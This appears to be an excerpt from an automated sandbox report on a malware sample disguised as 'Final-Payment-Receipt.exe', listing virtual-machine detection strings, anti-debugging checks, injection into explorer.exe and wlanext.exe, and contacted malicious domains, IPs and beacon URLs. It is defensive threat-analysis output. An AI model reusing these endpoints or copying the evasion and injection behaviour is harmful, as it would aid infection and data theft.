Source: explorer.exe, 00000002.00000000.241386939.00000000053A0000.00000004.00000001.sdmp	Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}F4
Source: explorer.exe, 00000002.00000002.490839971.00000000011B3000.00000004.00000020.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000002.00000002.499236558.00000000053A0000.00000004.00000001.sdmp	Binary or memory string: AF_UNIXa0%SystemRoot%\system32\mswsock.dll-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir
Source: explorer.exe, 00000002.00000000.246079624.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000002.00000000.245755606.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000002.00000002.499263196.00000000053C4000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000002.00000000.245755606.0000000008270000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000002.00000000.246079624.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: Final-Payment-Receipt.exe, 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000002.00000000.245755606.0000000008270000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\explorer.exe	Network Connect: 192.0.78.230 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 162.0.236.49 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 27.123.27.33 80	Jump to behavior

Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Thread register set: target process: 3472			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Thread register set: target process: 3472			Jump to behavior

Source: explorer.exe, 00000002.00000000.242407386.0000000005EA0000.00000004.00000001.sdmp, wlanext.exe, 00000003.00000002.492429748.0000000004C20000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.235646997.0000000001640000.00000002.00000001.sdmp, wlanext.exe, 00000003.00000002.492429748.0000000004C20000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.235646997.0000000001640000.00000002.00000001.sdmp, wlanext.exe, 00000003.00000002.492429748.0000000004C20000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000002.00000000.235309423.0000000001128000.00000004.00000020.sdmp	Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000002.00000000.235646997.0000000001640000.00000002.00000001.sdmp, wlanext.exe, 00000003.00000002.492429748.0000000004C20000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000002.00000000.235646997.0000000001640000.00000002.00000001.sdmp, wlanext.exe, 00000003.00000002.492429748.0000000004C20000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Queries volume information: C:\Users\user\Desktop\Final-Payment-Receipt.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation	Jump to behavior

IP	Domain	Country	ASN	ASN Name	Malicious
27.123.27.33	unknown	Australia	38719	DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU	true
192.0.78.230	unknown	United States	2635	AUTOMATTICUS	true
162.0.236.49	unknown	Canada	22612	NAMECHEAP-NETUS	true

Name	IP	Active
www.wacrox.com	162.0.236.49	true
themindofafunnygirl.com	192.0.78.230	true
trumpingitagain.com	27.123.27.33	true
g.msn.com	unknown	unknown
www.themindofafunnygirl.com	unknown	unknown
www.azarblock.com	unknown	unknown
www.trumpingitagain.com	unknown	unknown

Analysis Report Final-Payment-Receipt.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.wacrox.com/71m/?Rzr0iD=xuMbXRqvcjTkPYem20N3vsgWyUob49TNzNry+QjPYNTyHJJexkEaphWMorU+NKluO0/a&ZL3=rVvxt090-21lhr	true	Avira URL Cloud: safe	unknown
http://www.trumpingitagain.com/71m/?Rzr0iD=gir/TGf45q640hyvaYoOLmcQvbxfbyF+CK0IasCqTcsJdBCY+OvZ/ZhMnEHJcPXMDgdk&ZL3=rVvxt090-21lhr	true	Avira URL Cloud: safe	unknown
http://www.themindofafunnygirl.com/71m/?Rzr0iD=rhJBnfA/e5RktQ98+ow2gk+rbfXq49mIcD+nNtl3IG/t9WffOOBTTAV63Ad5zEG8kC/4&ZL3=rVvxt090-21lhr	true	Avira URL Cloud: safe	unknown

ID:	320833
Product:	CloudBasic
Start time:	22:18:38
Start date:	19.11.2020
Sample:	Final-Payment-Receipt.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	8f5d29001a9f5d4f62b47af6442be5ab
SHA1:	4838464ffe421aad7c9d73ba19420b7e9c2c427d
SHA256:	8e01fb320ffa60c0157bfc9aa8c6de43a7802d7f408de907a0d6338ce25c239c
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.80%